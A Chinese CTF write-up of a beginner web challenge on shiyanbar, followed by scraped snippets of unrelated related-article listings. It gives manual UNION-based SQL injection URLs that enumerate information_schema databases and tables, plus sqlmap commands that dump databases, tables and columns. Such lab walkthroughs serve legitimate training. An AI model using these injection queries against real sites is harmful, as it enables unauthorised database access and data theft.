21.这个看起来有点简单

这题就是个sqi注入的:

手工注入:

我先是简单尝试,就发现了,可以执行sql语句

http://ctf5.shiyanbar.com/8/index.php?id=2 group by 2 没报错

http://ctf5.shiyanbar.com/8/index.php?id=2 gourp by 3 报错

说明我们有两个字段可以提供给我们使用,比如说如下语句

http://ctf5.shiyanbar.com/8/index.php?id=2 union select 1,2

那么就简单了,直接查看所以数据库名

http://ctf5.shiyanbar.com/8/index.php?id=2 union select group_concat(schema_name,"~~"),2 from information_schema.schemata

得到三个数据库,我们猜测第2个数据库中(因为该页面的数据就在其中可以用database()查看)

查看里面所有的表

http://ctf5.shiyanbar.com/8/index.php?id=2 union select group_concat(table_name,"~~"),2 from information_schema.tables where table_schema =‘my_db‘

应该就是这个,查看字段名

OK现在可以直接看flag了

直接复制进去就可以提交了

SqlMap工具利用,这个就快当了:

探测是否有注入:

有注入漏洞:

爆破所有数据库:

-u "http://ctf5.shiyanbar.com/8/index.php?id=2" --dbs

发现三个数据库:

爆my_db库中的表:

-u "http://ctf5.shiyanbar.com/8/index.php?id=2" -D "my_db" --tables

发现两个表:

直接爆thiskey这个表中的字段:

http://ctf5.shiyanbar.com/8/index.php?id=2  -u "http://ctf5.shiyanbar.com/8/index.php?id=2" -D "my_db" -T "thiskey" --column

得到Key(我用的是最新sqlmap)

时间: 2024-10-20 11:47:01

21.这个看起来有点简单的相关文章

CTF---Web入门第三题 这个看起来有点简单!

这个看起来有点简单!分值:10 来源: 西普学院 难度:易 参与人数:10515人 Get Flag:3441人 答题人数:4232人 解题通过率:81% 很明显.过年过节不送礼,送礼就送这个 格式: 解题链接: http://ctf5.shiyanbar.com/8/index.php?id=1 原题链接:http://www.shiyanbar.com/ctf/33 [解题报告] 这是我入门Web开始写的第三道题,这道题看样子通过率还蛮高,难易程度显示易,咱们可以试试这题!咱们点开这个题看一

这个看起来有点简单!——实验吧

今天有点时间就多写几篇解题思路吧, 希望能够帮助到那些需要帮助的人, 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! 这一题做的时间比较久,但是收获颇多!!!! 永远爱你们的----新宝宝 这个看起来有点简单!分值:10 来源: 西普学院 难度:易 参与人数:14133人 Get Flag:5392人 答题人数:6278人 解题通过率:86% 很明显.过年过节不送礼,送礼就送这个 格式: 解题链接: http://ctf5.shiya

Java单例模式——并非看起来那么简单

版权声明:本文为[viclee]原创,如需转载请注明出处~ Java中单例(Singleton)模式是一种广泛使用的设计模式.单例模式的主要作用是保证在Java程序中,某个类只有一个实例存在.一些管理器和控制器常被设计成单例模式. 单例模式有很多好处,它能够避免实例对象的重复创建,不仅可以减少每次创建对象的时间开销,还可以节约内存空间:能够避免由于操作多个实例导致的逻辑错误.如果一个对象有可能贯穿整个应用程序,而且起到了全局统一管理控制的作用,那么单例模式也许是一个值得考虑的选择. 单例模式有很

Windows Phone开发(21):做一个简单的绘图板

其实我们今天要说的就是一个控件--InkPresenter,这个控件并不是十分强大,没办法和WPF中的InkCanvas相比,估计在实际开发中也很少可能会用到它,不过,我们还是来了解一下吧,毕竟用起来也不难. 使用该控件没有什么技术含量,注意一下以下几点就是了: 1.必须明确指定InkPresenter的宽度和高度,也就是不能使用自动值和Margin,不然不能收集墨迹,除非里面有子元素: 2.要收集墨迹,要设置Clip属性: 3.可以使用DrawingAttributes类设置墨迹的大小和颜色.

汉诺塔问题这样看,应该简单很多

参考链接 汉诺塔问题描述 汉诺塔:汉诺塔(又称河内塔)问题是源于印度一个古老传说的益智玩具.大梵天创造世界的时候做了三根金刚石柱子,在一根柱子上从下往上按照大小顺序摞着64片黄金圆盘.大梵天命令婆罗门把圆盘从下面开始按大小顺序重新摆放在另一根柱子上.并且规定,在小圆盘上不能放大圆盘,在三根柱子之间一次只能移动一个圆盘. 用递归解决问题,一个关键点是要有递归结束的条件 当只有一个盘子的时候,直接就是A->C,这也是递归结束的条件 当有两个盘子的时候,我们知道需要这样移动,A->B, A->

这个看起来有点简单!

①使用sqlmap sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --dbs       查数据库名 sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables       查表名 sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1&q

【LINUX/UNIX网络编程】之简单多线程服务器(多人群聊系统)

RT,Linux下使用c实现的多线程服务器.这个真是简单的不能再简单的了,有写的不好的地方,还希望大神轻拍.(>﹏<) 本学期Linux.unix网络编程的第四个作业. 先上实验要求: [实验目的] 1.熟练掌握线程的创建与终止方法: 2.熟练掌握线程间通信同步方法: 3.应用套接字函数完成多线程服务器,实现服务器与客户端的信息交互. [实验内容] 通过一个服务器实现最多5个客户之间的信息群发. 服务器显示客户的登录与退出: 客户连接后首先发送客户名称,之后发送群聊信息: 客户输入bye代表退

用php发邮件的简单实现

在两个月前的公司项目中,虽然没有涉及代码,但让我了解了php对于邮件的实现,知道了后台可以利用php来自动发送邮件.因为根本不会php,对于邮箱验证的过程,yy如下:首先在验证框中输入自己的邮箱地址,然后点击按钮,此时前端与后台开始交互,搜索了一下,前端将数据发送给后台,大概有三种方法,1可以直接POST,2用url传递,3用ajax,暂时觉得这个过程是个直接POST的过程,虽然我不知道是怎么实现的,貌似可以用form.此时后台php代码可以读到该邮箱地址,在数据库中判断是否注册,如没有则进行邮

越狱Season 1-Episode 21: Go

Season 1, Episode 21: Go -Michael: I need you to let me get us out of here. 我需要你帮我出去 -Patoshik: If you try to screw me over again, I'll kill you screw: [俚语]诈骗  again: 再一次 你再戏弄我,我就杀了你 -doctor: Because if crazy steps out of line, crazy: 疯狂的 step: 措施,举措